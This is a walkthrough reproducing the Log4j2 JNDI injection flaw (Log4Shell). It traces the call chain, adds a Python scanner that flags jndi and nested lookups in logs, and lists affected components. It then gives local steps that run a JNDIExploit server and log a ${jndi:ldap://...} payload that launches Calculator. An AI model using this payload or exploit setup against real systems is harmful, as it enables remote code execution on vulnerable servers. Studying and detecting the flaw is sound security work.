Log4j2 vulnerability reproduction

Principle

The log4j2 component does not correctly handle user input: a log message travels down the call chain below and ends up in JndiLookup.lookup, which is a classic JNDI injection problem:

* logger.error()--->AbstractLogger.tryLogMessage.log()--->org.apache.logging.log4j.core.Logger.log
* --->DefaultReliabilityStrategy.log()--->LoggerConfig.log()--->appender.control.callAppender()
* --->AppenderControl.tryCallAppender()--->AbstractOutputStreamAppender.append()--->PatternLayout.encode()
* --->MessagePatternConverter.format()--->StrSubstitutor.replace()--->StrSubstitutor.substitute()--->resolveVariable()--->JndiManager.lookup
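The last links of that chain are what a defender can key on: StrSubstitutor walks the formatted message looking for `${...}` lookups, resolving nested ones from the inside out, and hands a `jndi:` prefix to JndiManager.lookup. The script below is an added example (not part of the original post) that scans log lines for lookup expressions the same way, honouring nesting, and reports any `jndi:` lookup or any lookup that contains another lookup. The access-log lines and the 192.0.2.x addresses are constructed for the example.

```python
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample access-log lines for this example (not from the original post).
# Line 2 carries a JNDI lookup in the User-Agent; line 4 carries a nested lookup.
SAMPLE_LOG_LINES = [
    '192.0.2.10 - - "GET / HTTP/1.1" 200 ua="Mozilla/5.0"',
    '192.0.2.11 - - "GET / HTTP/1.1" 200 ua="${jndi:ldap://192.0.2.5:1389/a}"',
    '192.0.2.12 - - "GET /login HTTP/1.1" 302 ua="curl/7.79.1"',
    '192.0.2.13 - - "GET / HTTP/1.1" 200 ua="${${env:NAME}:value}"',
]


@dataclass
class Finding:
    line_no: int
    expression: str
    reason: str


def extract_lookups(text: str) -> List[str]:
    """Return every top-level ${...} expression in text.

    Nesting is tracked the way StrSubstitutor does it: a '${' inside a
    lookup opens a nested lookup, so '${${a}:b}' is returned whole.  An
    unterminated '${' is returned up to the end of the line so that it is
    still reported rather than silently dropped.
    """
    results = []
    i = 0
    n = len(text)
    while i < n:
        start = text.find("${", i)
        if start == -1:
            break
        depth = 0
        j = start
        while j < n:
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    results.append(text[start:j + 1])
                    break
            j += 1
        else:
            # Ran off the end of the line without closing the lookup.
            results.append(text[start:])
            break
        i = j + 1
    return results


def classify(expr: str) -> Optional[str]:
    """Label an extracted lookup, or return None if it looks harmless."""
    body = expr[2:-1] if expr.endswith("}") else expr[2:]
    if body.lower().startswith("jndi:"):
        return "jndi lookup"
    if "${" in body:
        # A lookup inside a lookup is never expected in request data.
        return "nested lookup"
    return None


def scan(lines: List[str]) -> List[Finding]:
    """Scan log lines and return one Finding per suspicious lookup."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for expr in extract_lookups(line):
            reason = classify(expr)
            if reason is not None:
                findings.append(Finding(line_no, expr, reason))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: {f.reason}: {f.expression}")
```

Running it on the constructed lines reports line 2 as a jndi lookup and line 4 as a nested lookup; the two ordinary User-Agent strings produce nothing. The scanner deliberately matches on the lookup structure rather than on a fixed `${jndi:` substring, so it also covers values that only become a `jndi:` lookup after the inner expression is resolved.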

Affected components

Component name | Affected versions
Apache Struts2 | all versions
ElasticSearch | 5.x, 6.x, 7.x, 8.0.0beta1, 8.0.0alpha1 and 8.0.0alpha2
Logstash | 5.0.0 through the latest release
Apache Flink | 1.11.0-rc1 through 1.14.0
Apache Druid | 0.7.x and above
Hadoop Hive | 2.x and 3.x
Apache Log4j SLF4J Binding '2.14.1', '2.14.0', '2.13.3', '2.13.2', '2.13.1', '2.13.0', '2.12.1', '2.12.0', '2.11.2', '2.11.1', '2.11.0', '2.10.0', '2.9.1', '2.9.0', '2.8.2', '2.8.1', '2.8', '2.7', '2.6.2', '2.6.1', '2.6', '2.5', '2.4.1', '2.4', '2.3', '2.2', '2.1', '2.0.2', '2.0.1', '2.0', '2.0-rc2', '2.0-rc1', '2.0-beta9', '2.0-beta8', '2.0-beta7', '2.0-beta6', '2.0-beta5'
Spring Boot '2.6.1', '2.6.0', '2.5.7', '2.5.6', '2.5.5', '2.5.4', '2.5.3', '2.5.2', '2.5.1', '2.5.0', '2.4.13', '2.4.12', '2.4.11', '2.4.10', '2.4.9', '2.4.8', '2.4.7', '2.4.6', '2.4.5', '2.4.4', '2.4.3', '2.4.2', '2.4.1', '2.4.0', '2.3.12.RELEASE', '2.3.11.RELEASE', '2.3.10.RELEASE', '2.3.9.RELEASE', '2.3.8.RELEASE', '2.3.7.RELEASE', '2.3.6.RELEASE', '2.3.5.RELEASE', '2.3.4.RELEASE', '2.3.3.RELEASE', '2.3.2.RELEASE', '2.3.1.RELEASE', '2.3.0.RELEASE', '2.2.13.RELEASE', '2.2.12.RELEASE', '2.2.11.RELEASE', '2.2.10.RELEASE', '2.2.9.RELEASE', '2.2.8.RELEASE', '2.2.7.RELEASE', '2.2.6.RELEASE', '2.2.5.RELEASE', '2.2.4.RELEASE', '2.2.3.RELEASE', '2.2.2.RELEASE', '2.2.1.RELEASE', '2.2.0.RELEASE', '2.1.18.RELEASE', '2.1.17.RELEASE', '2.1.16.RELEASE', '2.1.15.RELEASE', '2.1.14.RELEASE', '2.1.13.RELEASE', '2.1.12.RELEASE', '2.1.11.RELEASE', '2.1.10.RELEASE', '2.1.9.RELEASE', '2.1.8.RELEASE', '2.1.7.RELEASE', '2.1.6.RELEASE', '2.1.5.RELEASE', '2.1.4.RELEASE', '2.1.3.RELEASE', '2.1.2.RELEASE', '2.1.1.RELEASE', '2.1.0.RELEASE', '2.0.9.RELEASE', '2.0.8.RELEASE', '2.0.7.RELEASE', '2.0.6.RELEASE', '2.0.5.RELEASE', '2.0.4.RELEASE', '2.0.3.RELEASE', '2.0.2.RELEASE', '2.0.1.RELEASE', '2.0.0.RELEASE', '1.5.22.RELEASE', '1.5.21.RELEASE', '1.5.20.RELEASE', '1.5.19.RELEASE', '1.5.18.RELEASE', '1.5.17.RELEASE', '1.5.16.RELEASE', '1.5.15.RELEASE', '1.5.14.RELEASE', '1.5.13.RELEASE', '1.5.12.RELEASE', '1.5.11.RELEASE', '1.5.10.RELEASE', '1.5.9.RELEASE', '1.5.8.RELEASE', '1.5.7.RELEASE', '1.5.6.RELEASE', '1.5.5.RELEASE', '1.5.4.RELEASE', '1.5.3.RELEASE', '1.5.2.RELEASE', '1.5.1.RELEASE', '1.5.0.RELEASE', '1.4.7.RELEASE', '1.4.6.RELEASE', '1.4.5.RELEASE', '1.4.4.RELEASE', '1.4.3.RELEASE', '1.4.2.RELEASE', '1.4.1.RELEASE', '1.4.0.RELEASE', '1.3.8.RELEASE', '1.3.7.RELEASE', '1.3.6.RELEASE', '1.3.5.RELEASE', '1.3.4.RELEASE', '1.3.3.RELEASE', '1.3.2.RELEASE', '1.3.1.RELEASE', '1.3.0.RELEASE', '1.2.8.RELEASE', '1.2.7.RELEASE', '1.2.6.RELEASE', '1.2.5.RELEASE', '1.2.4.RELEASE', '1.2.3.RELEASE', 
'1.2.2.RELEASE', '1.2.1.RELEASE', '1.2.0.RELEASE', '1.1.12.RELEASE', '1.1.11.RELEASE', '1.1.10.RELEASE', '1.1.9.RELEASE', '1.1.8.RELEASE', '1.1.7.RELEASE', '1.1.6.RELEASE', '1.1.5.RELEASE', '1.1.4.RELEASE', '1.1.3.RELEASE', '1.1.2.RELEASE', '1.1.1.RELEASE', '1.1.0.RELEASE', '1.0.2.RELEASE', '1.0.1.RELEASE', '1.0.0.RELEASE'
Camel :: Core '3.13.0', '3.12.0', '3.11.4', '3.11.3', '3.11.2', '3.11.1', '3.11.0', '3.10.0', '3.9.0', '3.8.0', '3.7.6', '3.7.5', '3.7.4', '3.7.3', '3.7.2', '3.7.1', '3.7.0', '3.6.0', '3.5.0', '3.4.6', '3.4.5', '3.4.4', '3.4.3', '3.4.2', '3.4.1', '3.4.0', '3.3.0', '3.2.0', '3.1.0', '3.0.1', '3.0.0', '2.25.4', '2.25.3', '2.25.2', '2.25.1', '2.25.0', '2.24.3', '2.24.2', '2.24.1', '2.24.0', '2.23.4', '2.23.3', '2.23.2', '2.23.1', '2.23.0', '2.22.5', '2.22.4', '2.22.3', '2.22.2', '2.22.1', '2.22.0', '2.21.5', '2.21.4', '2.21.3', '2.21.2', '2.21.1', '2.21.0', '2.20.4', '2.20.3', '2.20.2', '2.20.1', '2.20.0', '2.19.5', '2.19.4', '2.19.3', '2.19.2', '2.19.1', '2.19.0', '2.18.5', '2.18.4', '2.18.3', '2.18.2', '2.18.1', '2.18.0', '2.17.7', '2.17.6', '2.17.5', '2.17.4', '2.17.3', '2.17.2', '2.17.1', '2.17.0', '2.16.5', '2.16.4', '2.16.3', '2.16.2', '2.16.1', '2.16.0', '2.15.6', '2.15.5', '2.15.4', '2.15.3', '2.15.2', '2.15.1', '2.15.0', '2.14.4', '2.14.3', '2.14.2', '2.14.1', '2.14.0', '2.13.4', '2.13.3', '2.13.2', '2.13.1', '2.13.0', '2.12.5', '2.12.4', '2.12.3', '2.12.2', '2.12.1', '2.12.0', '2.11.4', '2.11.3', '2.11.2', '2.11.1', '2.11.0', '2.10.7', '2.10.6', '2.10.5', '2.10.4', '2.10.3', '2.10.2', '2.10.1', '2.10.0', '2.9.8', '2.9.7', '2.9.6', '2.9.5', '2.9.4', '2.9.3', '2.9.2', '2.9.1', '2.9.0', '2.8.6', '2.8.5', '2.8.4', '2.8.3', '2.8.2', '2.8.1', '2.8.0', '2.7.5', '2.7.4', '2.7.3', '2.7.2', '2.7.1', '2.7.0', '2.6.0', '2.5.0', '2.4.0', '2.3.0', '2.2.0', '2.1.0', '2.0.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', '1.6.0', '1.5.0', '1.4.0', '1.3.0', '1.2.0', '1.1.0', '1.0.0', '3.0.0-M4', '3.0.0-M3', '3.0.0-M2', '3.0.0-M1', '2.0-M3', '2.0-M2', '2.0-M1', '3.0.0-RC3', '3.0.0-RC2', '3.0.0-RC1', '2.9.0-RC1'
JUnit Vintage Engine '5.8.2', '5.8.1', '5.8.0', '5.7.2', '5.7.1', '5.7.0', '5.6.3', '5.6.2', '5.6.1', '5.6.0', '5.5.2', '5.5.1', '5.5.0', '5.4.2', '5.4.1', '5.4.0', '5.3.2', '5.3.1', '5.3.0', '5.2.0', '5.1.1', '5.1.0', '4.12.3', '4.12.2', '4.12.1', '4.12.0', '5.8.0-M1', '5.7.0-M1', '5.6.0-M1', '5.5.0-M1', '5.4.0-M1', '5.3.0-M1', '5.2.0-M1', '5.1.0-M2', '5.1.0-M1', '4.12.0-M6', '4.12.0-M5', '4.12.0-M4', '4.12.0-M3', '4.12.0-M2', '4.12.0-M1', '5.8.0-RC1', '5.7.0-RC1', '5.6.0-RC1', '5.5.0-RC2', '5.5.0-RC1', '5.4.0-RC2', '5.4.0-RC1', '5.3.0-RC1', '5.2.0-RC1', '5.1.0-RC1', '4.12.0-RC3', '4.12.0-RC2', '4.12.0-RC1'
JBoss Logging 3 '3.4.2.Final', '3.4.1.Final', '3.4.0.Final', '3.3.3.Final', '3.3.2.Final', '3.3.1.Final', '3.3.0.Final', '3.2.1.Final', '3.2.0.Final', '3.1.0.CR2', '3.1.0.CR1', '3.0.0.CR1', '3.3.0.Beta1', '3.2.0.Beta1', '3.1.0.Beta3', '3.1.0.Beta2', '3.1.0.Beta1', '3.0.0.Beta5', '3.0.0.Beta4', '3.0.0.Beta3', '3.0.0.Beta2', '3.0.0.Beta1'
HikariCP '5.0.0', '4.0.3', '4.0.2', '4.0.1', '4.0.0', '3.4.5', '3.4.4', '3.4.3', '3.4.2', '3.4.1', '3.4.0', '3.3.1', '3.3.0', '3.2.0', '3.1.0', '3.0.0', '2.7.9', '2.7.8', '2.7.7', '2.7.6', '2.7.5', '2.7.4', '2.7.3', '2.7.2', '2.7.1', '2.7.0', '2.6.3', '2.6.2', '2.6.1', '2.6.0', '2.5.1', '2.5.0', '2.4.7', '2.4.6', '2.4.5', '2.4.4', '2.4.3', '2.4.2', '2.4.1', '2.4.0', '2.3.13', '2.3.12', '2.3.11', '2.3.10', '2.3.9', '2.3.8', '2.3.7', '2.3.6', '2.3.5', '2.3.4', '2.3.3', '2.3.2', '2.3.1', '2.3.0', '2.2.5', '2.2.4', '2.2.3', '2.2.2', '2.2.1', '2.2.0', '2.1.0', '2.0.1', '2.0.0', '1.4.0', '1.3.9', '1.3.8', '1.3.7', '1.3.6', '1.3.5', '1.3.4', '1.3.3', '1.3.2', '1.3.1', '1.3.0', '1.2.9', '1.2.8', '1.2.7', '1.2.6', '1.2.5', '1.2.4', '1.2.3', '1.2.2', '1.2.1', '1.1.9', '1.1.8', '1.1.7', '1.1.6', '1.1.5', '1.1.4', '1.1.3'
Logging '1.1.0', '1.0.0', '0.6.0', '0.5.0', '0.4.1', '0.4.0', '0.3.1', '0.3.0', '0.2.6', '0.2.4', '0.2.3', '0.2.2', '0.2.0', '0.1.2', '0.1.1', '0.1.0', '0.5.0-alpha.1', '0.5.0-alpha'
Jedis '3.7.0', '3.6.3', '3.6.2', '3.6.1', '3.6.0', '3.5.2', '3.5.1', '3.5.0', '3.4.1', '3.4.0', '3.3.0', '3.2.0', '3.1.0', '3.0.1', '3.0.0', '2.10.2', '2.10.1', '2.10.0', '2.9.3', '2.9.2', '2.9.1', '2.9.0', '2.8.2', '2.8.1', '2.8.0', '2.7.3', '2.7.2', '2.7.1', '2.7.0', '2.6.3', '2.6.2', '2.6.1', '2.6.0', '2.5.2', '2.5.1', '2.5.0', '2.4.2', '2.4.1', '2.4.0', '2.3.1', '2.3.0', '2.2.1', '2.2.0', '2.1.0', '2.0.0', '1.5.2', '1.5.1', '1.5.0', '1.4.0', '1.3.1', '1.3.0', 'jedis-3.6.2', '3.1.0-m4', '3.1.0-m3', '3.1.0-m2', '3.1.0-m1', '3.0.0-m1', '2.10.0-m1', '3.7.0-RC1', '3.6.0-RC1', '3.1.0-rc2', '3.1.0-rc', '3.0.1-rc1', '3.0.0-rc1', '2.10.0-rc1', '1.5.0-RC2', '1.5.0-RC1', '4.0.0-beta4', '4.0.0-beta3', '4.0.0-beta2', '4.0.0-beta1'
WSO2 Carbon Kernel Core '5.2.13', '5.2.8', '5.2.7', '5.2.6', '5.2.5', '5.2.4', '5.2.3', '5.2.2', '5.2.1', '4.6.2', '4.6.1', '4.6.0', '4.5.1', '4.4.37', '4.4.36', '4.4.35', '4.4.34', '4.4.33', '4.4.32', '4.4.31', '4.4.30', '4.4.29', '4.4.28', '4.4.27', '4.4.26', '4.4.25', '4.4.24', '4.4.23', '4.4.22', '4.4.21', '4.4.20', '4.4.19', '4.7.0-m6', '4.7.0-m5', '4.7.0-m4', '4.7.0-m3', '4.7.0-m2', '4.7.0-m1', '4.6.3-m5', '4.6.3-m4', '4.6.3-m3', '4.6.3-m2', '4.6.3-m1', '4.6.2-m9', '4.6.2-m8', '4.6.2-m7', '4.6.2-m6', '4.6.2-m5', '4.6.2-m4', '4.6.2-m3', '4.6.2-m2', '4.6.2-m1', '4.6.1-m8', '4.6.1-m7', '4.6.1-m6', '4.6.1-m5', '4.6.1-m4', '4.6.1-m3', '4.6.1-m2', '4.6.1-m1', '4.6.1-beta2', '4.6.1-beta', '4.6.0-beta2', '4.6.1-alpha3', '4.6.1-alpha2', '4.6.1-alpha', '4.6.0-alpha2', '4.6.0-alpha'

References

https://github.com/Yihsiwei/Log4j-exp

Attack flow diagram

[image: image-20220117015452097]

Local reproduction steps

Reproduction environment

macOS Monterey 12.0.1, IntelliJ IDEA 2021.1.3, java version "1.8.0_281"

  • 1. Download Log4j-exp

    https://pan.baidu.com/s/1lxXt-27-i7I_dOUACphVtQ  extraction code: nkc5

    The directory structure is as follows:

[image: image-20220103032453033]

  • 2. Start the local JNDI service

    java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.1.49

[image: image-20220103032326949]

  • 3. Import the project into IDEA, modify the log4jRCE file, and build the artifact

Open IDEA

[image: 3122138279]

Modify log4jRCE and add the payload

[image: 22987086]

    logger.error("${jndi:ldap://192.168.1.49:1389/Basic/Command/open -a  Calculator.app}");

Build the jar

[image: 3299580725-20220103035247600]

Run it

    java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar Log4j-rce.jar

Reproduction successful

[image: image-20220103033743511]
Last modified: 28 January 2022, 08:33 PM